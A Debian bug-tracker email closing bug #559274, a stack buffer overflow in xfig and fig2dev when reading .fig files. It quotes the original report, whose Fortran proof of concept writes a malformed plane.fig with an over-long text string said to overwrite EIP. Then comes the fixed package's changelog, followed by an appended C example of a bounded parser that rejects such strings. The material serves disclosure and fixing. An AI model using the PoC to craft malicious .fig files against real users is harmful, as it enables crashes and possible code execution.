Your message dated Sun, 06 Dec 2009 12:56:34 +0000
with message-id <e1nhgfc-0007xm...@ries.debian.org>
and subject line Bug#559274: fixed in xfig 1:3.2.5.b-1
has caused the Debian Bug report #559274,
regarding xfig: buffer overflow in read .fig file
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
559274: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=559274
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
--- Begin Message ---
Subject: xfig: buffer overflow in read .fig file
Package: xfig
Version: 1:3.2.5-rel-3
Severity: grave
Justification: user security hole
Tags: security

xfig and fig2dev in the transfig package will buffer overflow when reading a
.fig file. See the included PoC file; compile with gfortran.

-- PEDAMACHEPHEPTOLIONES & D.B. COOPER

-- System Information:
Debian Release: 5.0.3
  APT prefers stable
  APT policy: (500, 'stable')
Architecture: i386 (i686)

Kernel: Linux 2.6.26-1-686-bigmem (SMP w/2 CPU cores)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash

Versions of packages xfig depends on:
ii  libc6                    2.7-18          GNU C Library: Shared libraries
ii  libjpeg62                6b-14           The Independent JPEG Group's JPEG
ii  libpng12-0               1.2.27-2+lenny2 PNG library - runtime
ii  libx11-6                 2:1.1.5-2       X11 client-side library
ii  libxi6                   2:1.1.4-1       X11 Input extension library
ii  libxpm4                  1:3.5.7-1       X11 pixmap library
ii  libxt6                   1:1.0.5-3       X11 toolkit intrinsics library
ii  xaw3dg                   1.5+E-17        Xaw3d widget set

Versions of packages xfig recommends:
ii  transfig                 1:3.2.5-rel-3.1 Utilities for converting XFig figu
ii  xfig-libs                1:3.2.5-rel-3   XFig image libraries and examples

-- no debconf information

       PROGRAM XFIG_POC

CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
C
C      XFIG <= 3.2.5B BUFFER OVERFLOW
C      TRANSFIG <= 3.2.5A (FIG2DEV SOFT) BUFFER OVERFLOW
C      WWW.XFIG.ORG
C
C      AUTHORS:
C      * PEDAMACHEPHEPTOLIONES <pedamachepheptolio...@gmail.com>
C      * D.B. COOPER
C
C      PROBLEM:
C      A STACK-BASED BUFFER OVERFLOW OCCURS IN read_1_3_textobject()
C      WHEN READING MALFORMED .FIG FILES
C      EIP IS OVERWRITTEN SO IT'S NOT JUST A CRASH
C
C      TEST:
C      xfig plane.fig
C      fig2dev -L png plane.fig
C      (IT DOESN'T HAVE TO BE "PNG")
C
C      SOLUTION:
C      DON'T TAKE .FIG CANDY FROM STRANGERS
C
C      OLDSKOOL FORTRAN POCS FTW
C
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC

       INTEGER I
       CHARACTER(LEN=167) :: STR

       DO 10 I=1,167
       STR(I:I)='Z'
10     CONTINUE

       OPEN(11,FILE='plane.fig')
       WRITE(11,*) '0 1 2 3'
       WRITE(11,*) '4'
       WRITE(11,*) '1 2 3 4 5 6 7 '//STR
       CLOSE(11)

       WRITE(*,*) 'GREETZ: BACKUS AND BACCHUS'

       END PROGRAM XFIG_POC

--- End Message ---
--- Begin Message ---
Source: xfig
Source-Version: 1:3.2.5.b-1

We believe that the bug you reported is fixed in the latest version of
xfig, which is due to be installed in the Debian FTP archive:

xfig-doc_3.2.5.b-1_all.deb
  to main/x/xfig/xfig-doc_3.2.5.b-1_all.deb
xfig-libs_3.2.5.b-1_all.deb
  to main/x/xfig/xfig-libs_3.2.5.b-1_all.deb
xfig_3.2.5.b-1.diff.gz
  to main/x/xfig/xfig_3.2.5.b-1.diff.gz
xfig_3.2.5.b-1.dsc
  to main/x/xfig/xfig_3.2.5.b-1.dsc
xfig_3.2.5.b-1_amd64.deb
  to main/x/xfig/xfig_3.2.5.b-1_amd64.deb
xfig_3.2.5.b.orig.tar.gz
  to main/x/xfig/xfig_3.2.5.b.orig.tar.gz



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 559...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Roland Rosenfeld <rol...@debian.org> (supplier of updated xfig package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: RIPEMD160

Format: 1.8
Date: Sun, 06 Dec 2009 12:56:18 +0100
Source: xfig
Binary: xfig xfig-doc xfig-libs
Architecture: source all amd64
Version: 1:3.2.5.b-1
Distribution: unstable
Urgency: low
Maintainer: Roland Rosenfeld <rol...@debian.org>
Changed-By: Roland Rosenfeld <rol...@debian.org>
Description: 
 xfig       - Facility for Interactive Generation of figures under X11
 xfig-doc   - XFig on-line documentation and examples
 xfig-libs  - XFig image libraries and examples
Closes: 530898 535181 556705 559274
Changes: 
 xfig (1:3.2.5.b-1) unstable; urgency=low
 .
   * New upstream version 3.2.5b.
   * Remove patches that are incorporated upstream: 25_mkstemp,
     26_missingprotos, 27_zoom-crash, 28_text-size-input, 29_print_segfault.
   * 30_figparserstack: Fix Stack-based buffer overflow by loading
     malformed .FIG files
     (https://bugzilla.redhat.com/show_bug.cgi?id=543905) (Closes: #559274).
   * Upgrade to Standards-Version 3.8.3 (no changes).
   * Added debian/README.source (from dpatch package) to explain how dpatch
     works.
   * Remove path from update-xaw-wrappers script in preinst.
   * 31_spelling: Fix spelling errors in binary.
   * 13_remove_extra_libs: s/XTOOLONLYLIIB/XTOOLONLYLIB/, so Xt is linked
     into the binary to make binutils-gold happy (Closes: #556705).
   * 32_papersize_b1: xfig -papersize b1 now really uses B1 instead of B10
     (Closes: #535181).
   * 33_pdfimport_mediabox: Fix reading "/MediaBox" when importing PDF.
     Thanks to jso...@univ-lille2.fr for providing a patch (Closes: #530898).
   * 34_old_shadows: Restore old shadow behavior. Reduce shadow width to 1
     pixel and fix a green scrollbar shadow.
Checksums-Sha1: 
Checksums-Sha256: 
Files: 

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iEYEAREDAAYFAksbokYACgkQO7/Pd72LBQ0R8gCfd6QlPCJx1iT5adVG6TdLwhLL
dHkAn1LZnMglAsDvW4ibBYSpyRoa2Mu9
=Z9cv
-----END PGP SIGNATURE-----



--- End Message ---
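The changelog entry above (30_figparserstack) fixes a stack-based buffer overflow in the .fig text-object reader, read_1_3_textobject(). As an added illustration that is not xfig's code, the following bounded parser handles a record shaped like the PoC's text line (seven integer fields followed by the string; that layout and the 128-byte capacity are assumptions for the example) and rejects an over-long string instead of overrunning a fixed stack buffer.

```c
#include <errno.h>
#include <limits.h>
#include <stdlib.h>
#include <string.h>
struct text_obj {
    int f[7];       /* seven leading integer fields of the record */
    char str[128];  /* text payload (constructed capacity), NUL-terminated */
};

/* Bug class (hypothetical, not the xfig source): sscanf(line, "... %s", str)
 * into a fixed stack buffer has no width on "%s", so a 167-byte string like
 * the PoC's overruns it. This bounded parser returns 0 on success, -1 on
 * malformed fields, -2 if the text would not fit; it never writes past str. */
int parse_text_record(const char *line, struct text_obj *out)
{
    const char *p = line;
    for (int i = 0; i < 7; i++) {
        char *end; errno = 0;
        long v = strtol(p, &end, 10);
        if (end == p || errno == ERANGE || v < INT_MIN || v > INT_MAX) return -1;
        out->f[i] = (int)v;
        p = end;
    }
    while (*p == ' ' || *p == '\t') p++;   /* separator before the text */
    size_t n = strcspn(p, "\r\n");         /* payload runs to end of line */
    if (n >= sizeof out->str)              /* reject rather than overflow */
        return -2;
    memcpy(out->str, p, n);
    out->str[n] = '\0';
    return 0;
}

/* Constructed record shaped like the PoC's: seven fields then 167 'Z's. */
int check_overlong(void)
{
    char line[256] = "1 2 3 4 5 6 7 ";
    memset(line + 14, 'Z', 167); line[14 + 167] = '\0';
    struct text_obj t;
    return parse_text_record(line, &t);    /* -2: rejected, no overflow */
}

/* Well-formed record: fields and text must both come through intact. */
int check_wellformed(void)
{
    struct text_obj t;
    if (parse_text_record("1 2 3 4 5 6 7 hello world\n", &t) != 0) return 1;
    if (t.f[0] != 1 || t.f[6] != 7) return 2;
    return strcmp(t.str, "hello world");   /* 0 when parsed intact */
}
```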
